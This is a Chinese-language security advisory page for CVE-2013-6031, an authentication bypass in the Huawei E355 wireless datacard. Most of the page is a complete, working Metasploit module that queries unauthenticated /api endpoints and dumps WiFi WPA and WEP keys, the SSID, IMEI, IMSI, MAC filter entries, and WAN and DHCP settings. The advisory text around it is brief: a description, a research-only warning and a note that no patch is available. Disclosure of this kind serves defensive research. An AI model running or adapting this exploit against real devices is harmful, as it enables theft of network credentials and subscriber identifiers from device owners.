安全研究
安全漏洞
Huawei E355安全限制绕过漏洞(CVE-2013-6031)
发布日期:2014-03-06
更新日期:2014-03-07
受影响系统:
Huawei E355描述:
BUGTRAQ ID: 66017
CVE(CAN) ID: CVE-2013-6031
Huawei E355是无线上网卡产品。
Huawei E355在实现上存在安全限制荣漏洞,攻击者可利用此漏洞绕过某些安全限制并获取受影响设备的管理员访问权限。
<*来源:Jimson K James
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Huawei Datacard, CSRF Information Disclosure
Vulnerability",
'Description' => %q{
This module exploits an un-authenticated information disclosure
vulnerability in Huawei
SOHO routers. It will gather information by accessing the /api pages
where
authentication is not required, thus allowing configuration changes
as well as information disclosure including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jimson K James.',
'tomsmaily [at] aczire.com', #Msf module
],
'References' =>
[
[ 'CVE', '2013-6031' ],
# [ 'OSVDB', '6031' ],
# [ 'BID', '6031' ],
# [ 'URL', 'http://seclists.org/bugtraq/2013/Nov/6031' ],
],
'DisclosureDate' => "Nov 11 2013" ))
register_options(
[
OptString.new('PASSWORD', [ true, 'The password to reset to',
'admin']),
OptBool.new('GAP', [false, 'Attempt admin password reset using wifi
password.', false]),
], self.class)
end
def run
#Gather basic router information
get_router_info
print_status("")
get_router_mac_filter_info
print_status("")
get_router_wan_info
print_status("")
get_router_dhcp_info
print_status("")
print_status("Now trying to get WiFi Key details...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/security-settings',
}, 25)
#check whether we got any response from server and proceed.
if not res
print_error("Failed to get any response from server!!!")
return
end
#Is it a HTTP OK
if (!(res.code == 200))
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to verify server reported is a Huawei router
if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i)))
print_error("Target doesn't seem to be a Huawei router. Exiting!")
return
end
print_status("---===[ WiFi Key Details ]===---")
wifissid = get_router_ssid
if wifissid
print_status("WiFi SSID: #{wifissid}")
end
# Grabbing the wifiwpapsk
if res.body.match(/<WifiWpapsk>(.*)<\/WifiWpapsk>/i)
wifiwpapsk = $1
print_status("Wifi WPA PSK: #{wifiwpapsk}")
end
# Grabbing the WifiAuthmode
if res.body.match(/<WifiAuthmode>(.*)<\/WifiAuthmode>/i)
wifiauthmode = $1
print_status("Wifi Auth mode: #{wifiauthmode}")
end
# Grabbing the WifiBasicencryptionmodes
if
res.body.match(/<WifiBasicencryptionmodes>(.*)<\/WifiBasicencryptionmodes>/i)
wifibasicencryptionmodes = $1
print_status("Wifi Basic encryption modes:
#{wifibasicencryptionmodes}")
end
# Grabbing the WifiWpaencryptionmodes
if
res.body.match(/<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i)
wifiwpaencryptionmodes = $1
print_status("Wifi WPA Encryption Modes:
#{wifiwpaencryptionmodes}")
end
# Grabbing the WifiWepKey1
if res.body.match(/<WifiWepKey1>(.*)<\/WifiWepKey1>/i)
wifiWepKey1 = $1
print_status("Wifi WEP Key1: #{wifiWepKey1}")
end
# Grabbing the WifiWepKey2
if res.body.match(/<WifiWepKey2>(.*)<\/WifiWepKey2>/i)
wifiWepKey2 = $1
print_status("Wifi WEP Key2: #{wifiWepKey2}")
end
# Grabbing the WifiWepKey3
if res.body.match(/<WifiWepKey3>(.*)<\/WifiWepKey3>/i)
wifiWepKey3 = $1
print_status("Wifi WEP Key3: #{wifiWepKey3}")
end
# Grabbing the WifiWepKey4
if res.body.match(/<WifiWepKey4>(.*)<\/WifiWepKey4>/i)
wifiWepKey4 = $1
print_status("Wifi WEP Key4: #{wifiWepKey4}")
end
# Grabbing the WifiWepKeyIndex
if res.body.match(/<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i)
wifiWepKeyIndex = $1
print_status("Wifi WEP Key Index: #{wifiWepKeyIndex}")
end
rescue::Exception => e
print_status("Ooooops: #{e.class} #{e}")
#end run
end
def get_router_info
print_status("Attempting to connect to #{rhost} to gather basic
device information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/device/information',
}, 25)
#check whether we got any response from server and proceed.
if not res
print_error("Failed to get any response from server!!!")
return
end
#Is it a HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server
header")
else
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to verify server reported is a Huawei router
if (res.headers['Server'].match(/IPWEBS\/1.4.0/i))
print_status("Server is a Huawei router! Grabbing info\n")
else
print_error("Target doesn't seem to be a Huawei router. Exiting!")
return
end
print_status("---===[ Basic Information ]===---")
# Grabbing the DeviceName
if res.body.match(/<DeviceName>(.*)<\/DeviceName>/i)
deviceName = $1
print_status("Device Name: #{deviceName}")
end
# Grabbing the SerialNumber
if res.body.match(/<SerialNumber>(.*)<\/SerialNumber>/i)
serialNumber = $1
print_status("Serial Number: #{serialNumber}")
end
# Grabbing the IMEI
if res.body.match(/<Imei>(.*)<\/Imei>/i)
imei = $1
print_status("IMEI: #{imei}")
end
# Grabbing the IMSI
if res.body.match(/<Imsi>(.*)<\/Imsi>/i)
imsi = $1
print_status("IMSI: #{imsi}")
end
# Grabbing the ICCID
if res.body.match(/<Iccid>(.*)<\/Iccid>/i)
iccid = $1
print_status("ICCID: #{imsi}")
end
# Grabbing the HardwareVersion
if res.body.match(/<HardwareVersion>(.*)<\/HardwareVersion>/i)
hardwareVersion = $1
print_status("Hardware Version: #{hardwareVersion}")
end
# Grabbing the SoftwareVersion
if res.body.match(/<SoftwareVersion>(.*)<\/SoftwareVersion>/i)
softwareVersion = $1
print_status("Software Version: #{softwareVersion}")
end
# Grabbing the WebUIVersion
if res.body.match(/<WebUIVersion>(.*)<\/WebUIVersion>/i)
webUIVersion = $1
print_status("WebUI Version: #{webUIVersion}")
end
# Grabbing the MacAddress1
if res.body.match(/<MacAddress1>(.*)<\/MacAddress1>/i)
macAddress1 = $1
print_status("Mac Address1: #{macAddress1}")
end
# Grabbing the MacAddress2
if res.body.match(/<MacAddress2>(.*)<\/MacAddress2>/i)
macAddress2 = $1
print_status("Mac Address2: #{macAddress2}")
end
# Grabbing the ProductFamily
if res.body.match(/<ProductFamily>(.*)<\/ProductFamily>/i)
productFamily = $1
print_status("Product Family: #{productFamily}")
end
# Grabbing the Classification
if res.body.match(/<Classify>(.*)<\/Classify>/i)
classify = $1
print_status("Classification: #{classify}")
end
end
def get_router_ssid
#print_status("Attempting to connect to
http://#{rhost}/api/device/information to get router ssid")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/basic-settings',
}, 25)
#check whether we got any response from server and proceed.
if not res
print_error("Failed to get any response from server!!!")
return
end
#Is it a HTTP OK
if (!(res.code == 200))
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to verify server reported is a Huawei router
if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i)))
print_error("Target doesn't seem to be a Huawei router. Exiting!")
return
end
# Grabbing the Wifi SSID
if res.body.match(/<WifiSsid>(.*)<\/WifiSsid>/i)
ssid = $1
#print_status("SSID #{ssid}")
return $1
end
end
def get_router_mac_filter_info
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/mac-filter',
}, 25)
#check whether we got any response from server and proceed.
if not res
print_error("Failed to get any response from server!!!")
return
end
#Is it a HTTP OK
if (!(res.code == 200))
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to verify server reported is a Huawei router
if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i)))
print_error("Target doesn't seem to be a Huawei router. Exiting!")
return
end
print_status("---===[ MAC Filter Information ]===---")
# Grabbing the WifiMacFilterStatus
if
res.body.match(/<WifiMacFilterStatus>(.*)<\/WifiMacFilterStatus>/i)
wifiMacFilterStatus = $1
print_status("Wifi MAC Filter Status: #{(wifiMacFilterStatus == "1") ?
"ENABLED" : "DISABLED"}" )
end
# Grabbing the WifiMacFilterMac0
if res.body.match(/<WifiMacFilterMac0>(.*)<\/WifiMacFilterMac0>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac1
if res.body.match(/<WifiMacFilterMac1>(.*)<\/WifiMacFilterMac1>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac2
if res.body.match(/<WifiMacFilterMac2>(.*)<\/WifiMacFilterMac2>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac3
if res.body.match(/<WifiMacFilterMac3>(.*)<\/WifiMacFilterMac3>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac4
if res.body.match(/<WifiMacFilterMac4>(.*)<\/WifiMacFilterMac4>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac5
if res.body.match(/<WifiMacFilterMac5>(.*)<\/WifiMacFilterMac5>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac6
if res.body.match(/<WifiMacFilterMac6>(.*)<\/WifiMacFilterMac6>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac7
if res.body.match(/<WifiMacFilterMac7>(.*)<\/WifiMacFilterMac7>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac8
if res.body.match(/<WifiMacFilterMac8>(.*)<\/WifiMacFilterMac8>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
# Grabbing the WifiMacFilterMac9
if res.body.match(/<WifiMacFilterMac9>(.*)<\/WifiMacFilterMac9>/i)
wifiMacFilterMac = $1
if !(wifiMacFilterMac == "")
print_status("Mac: #{wifiMacFilterMac}")
end
end
end
def get_router_wan_info
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/monitoring/status',
}, 25)
#check whether we got any response from server and proceed.
if not res
print_error("Failed to get any response from server!!!")
return
end
#Is it a HTTP OK
if (!(res.code == 200))
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to verify server reported is a Huawei router
if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i)))
print_error("Target doesn't seem to be a Huawei router. Exiting!")
return
end
print_status("---===[ WAN Details ]===---")
# Grabbing the WanIPAddress
if res.body.match(/<WanIPAddress>(.*)<\/WanIPAddress>/i)
wanIPAddress = $1
print_status("Wan IP Address: #{wanIPAddress}")
end
# Grabbing the PrimaryDns
if res.body.match(/<PrimaryDns>(.*)<\/PrimaryDns>/i)
primaryDns = $1
print_status("Primary Dns: #{primaryDns}")
end
# Grabbing the SecondaryDns
if res.body.match(/<SecondaryDns>(.*)<\/SecondaryDns>/i)
secondaryDns = $1
print_status("Secondary Dns: #{secondaryDns}")
end
end
def get_router_dhcp_info
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/dhcp/settings',
}, 25)
#check whether we got any response from server and proceed.
if not res
print_error("Failed to get any response from server!!!")
return
end
#Is it a HTTP OK
if (!(res.code == 200))
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to verify server reported is a Huawei router
if (!(res.headers['Server'].match(/IPWEBS\/1.4.0/i)))
print_error("Target doesn't seem to be a Huawei router. Exiting!")
return
end
print_status("---===[ DHCP Details ]===---")
# Grabbing the DhcpIPAddress
if res.body.match(/<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i)
dhcpIPAddress = $1
print_status("LAN IP Address: #{dhcpIPAddress}")
end
# Grabbing the DhcpStatus
if res.body.match(/<DhcpStatus>(.*)<\/DhcpStatus>/i)
dhcpStatus = $1
print_status("DHCP: #{(dhcpStatus=="1") ? "ENABLED" :
"DISABLED"}")
end
if (dhcpStatus != "1")
return
end
# Grabbing the DhcpStartIPAddress
if res.body.match(/<DhcpStartIPAddress>(.*)<\/DhcpStartIPAddress>/i)
dhcpStartIPAddress = $1
print_status("DHCP StartIPAddress: #{dhcpStartIPAddress}")
end
# Grabbing the DhcpEndIPAddress
if res.body.match(/<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i)
dhcpEndIPAddress = $1
print_status("DHCP EndIPAddress: #{dhcpEndIPAddress}")
end
# Grabbing the DhcpLeaseTime
if res.body.match(/<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i)
dhcpLeaseTime = $1
print_status("DHCP Lease Time: #{dhcpLeaseTime}")
end
end
#end module
end
建议:
厂商补丁:
Huawei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://support.huawei.com/enterprise/
浏览次数:2038
严重程度:0(网友投票)
绿盟科技给您安全的保障